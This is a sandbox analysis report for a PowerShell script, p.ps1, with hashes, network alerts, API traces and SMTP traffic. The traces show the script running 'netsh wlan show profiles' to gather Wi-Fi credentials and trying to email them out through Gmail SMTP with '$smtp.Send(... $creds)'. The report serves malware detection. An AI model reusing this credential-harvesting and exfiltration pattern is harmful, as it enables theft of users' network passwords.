Summary | ZeroBOX

p.ps1

Generic Malware Antivirus
Category Machine Started Completed
FILE s1_win7_x6403_us Dec. 6, 2023, 12:08 p.m. Dec. 6, 2023, 12:12 p.m.
Size 876.0B
Type ASCII text, with very long lines
MD5 3dc32f74db9c2b56bca483d6e56316be
SHA256 56ed49af1ac80ae95a9643aafff85808cae49911ba44ef02e60b016c45ff0cad
CRC32 7C122B90
ssdeep 24:lodZVJd1HHnkr/Euok3cqG7rDsCL79vHtKf:OxntqwgIm
Yara None matched

Name            Response        Post-Analysis Lookup
smtp.gmail.com  64.233.188.108

IP Address     Status  Action
142.251.8.108  Active  Moloch
164.124.101.2  Active  Moloch

Suricata Alerts

Flow                                           SID        Signature                                                       Category
TCP 142.251.8.108:587 -> 192.168.56.103:49166  2260002    SURICATA Applayer Detect protocol only one direction            Generic Protocol Command Decode
TCP 192.168.56.103:49166 -> 142.251.8.108:587  906200054  SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)  undefined

Suricata TLS

Flow         TLSv1 192.168.56.103:49166 -> 142.251.8.108:587
Issuer       C=US, O=Google Trust Services LLC, CN=GTS CA 1C3
Subject      CN=smtp.gmail.com
Fingerprint  5b:45:37:1e:52:7e:3c:86:d1:d6:68:34:a3:03:1c:11:aa:87:0e:aa

Time & API Arguments Status Return Repeated

GetComputerNameW

computer_name: TEST22-PC
1 1 0
Time & API Arguments Status Return Repeated

WriteConsoleW

buffer: Exception calling "Send" with "4" argument(s): "The SMTP server requires a secu
console_handle: 0x00000027
1 1 0

WriteConsoleW

buffer: re connection or the client was not authenticated. The server response was: 5.7
console_handle: 0x00000033
1 1 0

WriteConsoleW

buffer: .0 Authentication Required. Learn more at"
console_handle: 0x0000003f
1 1 0

WriteConsoleW

buffer: At C:\Users\test22\AppData\Local\Temp\p.ps1:30 char:11
console_handle: 0x0000004b
1 1 0

WriteConsoleW

buffer: + $smtp.Send <<<< ($email, $email, $subject, $creds);
console_handle: 0x00000057
1 1 0

WriteConsoleW

buffer: + CategoryInfo : NotSpecified: (:) [], MethodInvocationException
console_handle: 0x00000063
1 1 0

WriteConsoleW

buffer: + FullyQualifiedErrorId : DotNetMethodException
console_handle: 0x0000006f
1 1 0

WriteConsoleW

buffer: The term 'pause' is not recognized as the name of a cmdlet, function, script fi
console_handle: 0x0000001f
1 1 0

WriteConsoleW

buffer: le, or operable program. Check the spelling of the name, or if a path was inclu
console_handle: 0x0000002b
1 1 0

WriteConsoleW

buffer: ded, verify that the path is correct and try again.
console_handle: 0x00000037
1 1 0

WriteConsoleW

buffer: At C:\Users\test22\AppData\Local\Temp\p.ps1:32 char:6
console_handle: 0x00000043
1 1 0

WriteConsoleW

buffer: + pause <<<<
console_handle: 0x0000004f
1 1 0

WriteConsoleW

buffer: + CategoryInfo : ObjectNotFound: (pause:String) [], CommandNotFou
console_handle: 0x0000005b
1 1 0

WriteConsoleW

buffer: ndException
console_handle: 0x00000067
1 1 0

WriteConsoleW

buffer: + FullyQualifiedErrorId : CommandNotFoundException
console_handle: 0x00000073
1 1 0
Time & API Arguments Status Return Repeated

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x04ec4148
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x04ec4148
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x04ec4148
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x04ec4148
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x04ec4148
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x04ec4148
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x04ec4148
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x04ec4148
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

1 1 0
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

process_identifier: 1884
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024db000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1884
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0252f000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1884
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024a9000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1884
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x055d0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1884
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x055d1000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1884
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x055d2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1884
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x055d3000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1884
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05f70000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1884
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02529000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1884
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x027a2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1884
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05f71000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1884
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x027a3000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1884
region_size: 1769472
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x06640000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1884
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x067b0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1884
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x067b1000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1884
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x067b2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1884
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x067b3000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1884
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x067b4000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1884
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x067b5000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1884
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x055d4000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1884
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x055d5000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1884
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x055d6000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1884
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x055d7000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1884
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024ad000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1884
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05341000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1884
region_size: 16384
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x067b6000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1884
region_size: 69632
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x067ba000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1884
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x067cb000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1884
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x067cc000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1884
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x067cd000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0
Time & API Arguments Status Return Repeated

GetAdaptersAddresses

flags: 1158
family: 0
1 0 0
Data received 220 smtp.gmail.com ESMTP l3-20020a17090270c300b001cf6783fd41sm10974530plt.17 - gsmtp
Data received 250-smtp.gmail.com at your service, [175.208.134.152] 250-SIZE 35882577 250-8BITMIME 250-STARTTLS 250-ENHANCEDSTATUSCODES 250-PIPELINING 250-CHUNKING 250 SMTPUTF8
Data received 220 2.0.0 Ready to start TLS
Data received [binary TLS records after STARTTLS, not printable: a ServerHello whose random carries the DOWNGRD downgrade-protection sentinel, then the server certificate chain: smtp.gmail.com issued by GTS CA 1C3 (valid 231023112351Z to 240115112350Z), GTS CA 1C3 issued by GTS Root R1 (valid 200813000042Z to 270930000042Z), and GTS Root R1 cross-signed by GlobalSign Root CA (valid 200619000042Z to 280128000042Z), with AIA/CRL/policy references http://ocsp.pki.goog/gts1c3, http://pki.goog/repo/certs/gts1c3.der, http://crls.pki.goog/gts1c3/QOvJ0N1sT2A.crl, http://ocsp.pki.goog/gtsr1, http://pki.goog/repo/certs/gtsr1.der, http://crl.pki.goog/gtsr1/gtsr1.crl, https://pki.goog/repository/, http://ocsp.pki.goog/gsr1, http://pki.goog/gsr1/gsr1.crt, http://crl.pki.goog/gsr1/gsr1.crl; followed by the remaining handshake and encrypted records]
Data sent EHLO test22-PC
Data sent STARTTLS
Data sent [binary TLS records, not printable: a ClientHello carrying the SNI smtp.gmail.com, followed by the rest of the client handshake and encrypted records]
domain smtp.gmail.com
cmdline "C:\Windows\system32\netsh.exe" wlan show profiles
receiver [] sender [] server 142.251.8.108
description powershell.exe tried to sleep 2728263 seconds, actually delayed analysis time by 2728263 seconds
registry HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F81F111D0E5AB58D396F7BF525577FD30FDC95AA\Blob
Time & API Arguments Status Return Repeated

send

buffer: EHLO test22-PC
socket: 1492
sent: 16
1 16 0

send

buffer: STARTTLS
socket: 1492
sent: 10
1 10 0

send

buffer: <binary TLS ClientHello with SNI smtp.gmail.com, not printable>
socket: 1492
sent: 118
1 118 0

send

buffer: <binary TLS handshake record, not printable>
socket: 1492
sent: 134
1 134 0

send

buffer: <binary TLS record, not printable>
socket: 1492
sent: 53
1 53 0

send

buffer: <binary TLS record, not printable>
socket: 1492
sent: 69
1 69 0

send

buffer: <binary TLS record, not printable>
socket: 1492
sent: 53
1 53 0

send

buffer: <binary TLS record, not printable>
socket: 1492
sent: 69
1 69 0
parent_process powershell.exe martian_process "C:\Windows\system32\netsh.exe" wlan show profiles
file C:\Windows\System32\netsh.exe